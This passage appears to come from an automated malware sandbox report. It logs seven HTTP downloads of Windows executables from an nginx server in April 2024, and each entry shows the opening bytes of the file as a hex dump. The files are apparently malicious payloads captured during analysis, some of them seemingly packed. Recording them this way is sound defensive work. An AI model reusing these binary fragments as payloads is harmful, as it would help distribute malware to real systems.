00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:06 GMTContent-Type: application/octet-streamContent-Length: 112128Last-Modified: Sun, 03 Mar 2024 11:54:32 GMTConnection: keep-aliveETag: "65e464f8-1b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6a 12 e4 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 ec 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a1 01 00 9c 00 00 00 bc a1 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 d4 14 00 00 f0 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 23 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 69 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:12 GMTContent-Type: application/octet-streamContent-Length: 1166336Last-Modified: Fri, 19 Apr 2024 00:36:20 GMTConnection: keep-aliveETag: "6621bc84-11cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 84 bc 21 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 1c 08 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 12 00 00 04 00 00 94 fe 11 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 7c 61 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 11 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c 61 04 00 00 40 0d 00 00 62 04 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 11 00 00 76 00 00 00 56 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:16 GMTContent-Type: application/octet-streamContent-Length: 2295808Last-Modified: Fri, 19 Apr 2024 00:36:37 GMTConnection: keep-aliveETag: "6621bc95-230800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 9f 1a ea 14 fe 74 b9 14 fe 74 b9 14 fe 74 b9 5f 86 77 b8 1f fe 74 b9 5f 86 71 b8 d4 fe 74 b9 5f 86 73 b8 15 fe 74 b9 d6 7f 89 b9 10 fe 74 b9 d6 7f 70 b8 07 fe 74 b9 d6 7f 77 b8 0e fe 74 b9 d6 7f 71 b8 4f fe 74 b9 5f 86 70 b8 0c fe 74 b9 5f 86 72 b8 15 fe 74 b9 5f 86 75 b8 0f fe 74 b9 14 fe 75 b9 34 ff 74 b9 e7 7c 7d b8 08 fe 74 b9 e7 7c 74 b8 15 fe 74 b9 e7 7c 8b b9 15 fe 74 b9 14 fe e3 b9 15 fe 74 b9 e7 7c 76 b8 15 fe 74 b9 52 69 63 68 14 fe 74 b9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 0c 9a 1f 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 34 11 00 00 32 04 00 00 00 00 00 00 10 58 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 58 00 00 04 00 00 0a 19 23 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 54 4d 57 00 4c 00 00 00 6d 10 15 00 95 00 00 00 00 50 14 00 ec b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 4d 57 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 4c 57 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 e4 13 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 14 00 00 10 00 00 00 3e 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ec b5 00 00 00 50 14 00 00 82 00 00 00 4e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 15 00 00 02 00 00 00 d0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 20 15 00 00 02 00 00 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 6a 77 79 65 79 6e 69 00 40 19 00 00 d0 3e 00 00 32 19 00 00 d4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 6f 65 75 71 78 77 62 00 10 00 00 00 10 58 00 00 02 00 00 00 06 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:22 GMTContent-Type: application/octet-streamContent-Length: 2310656Last-Modified: Fri, 19 Apr 2024 00:36:46 GMTConnection: keep-aliveETag: "6621bc9e-234200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 9f 1a ea 14 fe 74 b9 14 fe 74 b9 14 fe 74 b9 5f 86 77 b8 1f fe 74 b9 5f 86 71 b8 d4 fe 74 b9 5f 86 73 b8 15 fe 74 b9 d6 7f 89 b9 10 fe 74 b9 d6 7f 70 b8 07 fe 74 b9 d6 7f 77 b8 0e fe 74 b9 d6 7f 71 b8 4f fe 74 b9 5f 86 70 b8 0c fe 74 b9 5f 86 72 b8 15 fe 74 b9 5f 86 75 b8 0f fe 74 b9 14 fe 75 b9 34 ff 74 b9 e7 7c 7d b8 08 fe 74 b9 e7 7c 74 b8 15 fe 74 b9 e7 7c 8b b9 15 fe 74 b9 14 fe e3 b9 15 fe 74 b9 e7 7c 76 b8 15 fe 74 b9 52 69 63 68 14 fe 74 b9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 0c 9a 1f 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 34 11 00 00 48 04 00 00 00 00 00 00 00 59 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 59 00 00 04 00 00 a3 8c 23 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 cc 4a 58 00 4c 00 00 00 5e 10 15 00 72 00 00 00 00 50 14 00 f8 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 4a 58 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 4a 58 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 e4 13 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 14 00 00 10 00 00 00 3e 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f8 b2 00 00 00 50 14 00 00 80 00 00 00 4e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 15 00 00 02 00 00 00 ce 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2a 00 00 20 15 00 00 02 00 00 00 d0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 61 76 6e 65 79 71 71 00 70 19 00 00 90 3f 00 00 6c 19 00 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 78 63 77 7a 66 70 63 00 10 00 00 00 00 59 00 00 04 00 00 00 3e 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:30:04 GMTContent-Type: application/octet-streamContent-Length: 1285632Last-Modified: Thu, 01 Feb 2024 16:00:36 GMTConnection: keep-aliveETag: "65bbc024-139e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 0f bf bb 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:30:04 GMTContent-Type: application/octet-streamContent-Length: 97792Last-Modified: Fri, 19 Apr 2024 00:20:52 GMTConnection: keep-aliveETag: "6621b8e4-17e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a2 a9 0c f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 01 00 00 08 00 00 00 00 00 00 4e 93 01 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 01 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 93 01 00 4b 00 00 00 00 a0 01 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 73 01 00 00 20 00 00 00 74 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 de 04 00 00 00 a0 01 00 00 06 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 01 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 93 01 00 00 00 00 00 48 00 00 00 02 00 05 00 b4 af 00 00 4c e3 00 00 03 00 00 00 43 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 09 00 20 03 00 00 01 00 00 11 73 01 00 00 0a 0a 02 7e 03 00 00 04 25 2d 17 26 7e 02 00 00 04 fe 06 10 00 00 06 73 02 00 00 0a 25 80 03 00 00 04 28 01 00 00 2b 6f 04 00 00 0a 0b 38 cc 02 00 00 07 6f 05 00 00 0a 17 17 19 8d 08 00 00 01 25 16 1f 0a 8d 09 00 00 01 25 d0 0a 01 00 04 28 06 00 00 0a 73 07 00 00 0a a2 25 17 1e 8d 09 00 00 01 25 d0 02 01 00 04 28 06 00 00 0a 73 07 00 00 0a a2 25 18 1d 8d 09 00 00 01 25 d0 07 01 00 04 28 06 00 00 0a 73 07 00 00 0a a2 28 01 01 00 06 6f 08 00 00 0a 0c 38 46 02 00 00 12 02 28 09 00 00 0a 0d 73 09 00 00 06 13 04 73 2c 01 00 06 13 05 11 04 7e 0a 00 00 0a 7d 01 00 00 04 7e 0a 00 00 0a 13 06 11 04 09 73 0b 00 00 0a 28 0c 00 00 0a 6f 0d 00 00 0a 7d 01 00 00 04 11 04 7b 01 00 00 04 1f 0f 8d 09 00 00 01 25 d0 12 01 00 04 28 06 00 00 0a 73 07 00 00 0a 6f 0e 00 00 0a 2c 1a 1e 8d 09 00 00 01 25 d0 fd 00 00 04 28 06 00 00 0a 73 07 00 00 0a 13 06 2b 4f 09 1f 3e 8d 09 00 00 01 25 d0 ca 00 00 04 28 06 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:30:07 GMTContent-Type: application/octet-streamContent-Length: 112128Last-Modified: Thu, 01 Feb 2024 16:00:35 GMTConnection: keep-aliveETag: "65bbc023-1b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 11 bf bb 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 ec 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a1 01 00 9c 00 00 00 bc a1 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 d4 14 00 00 f0 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 23 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 69 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
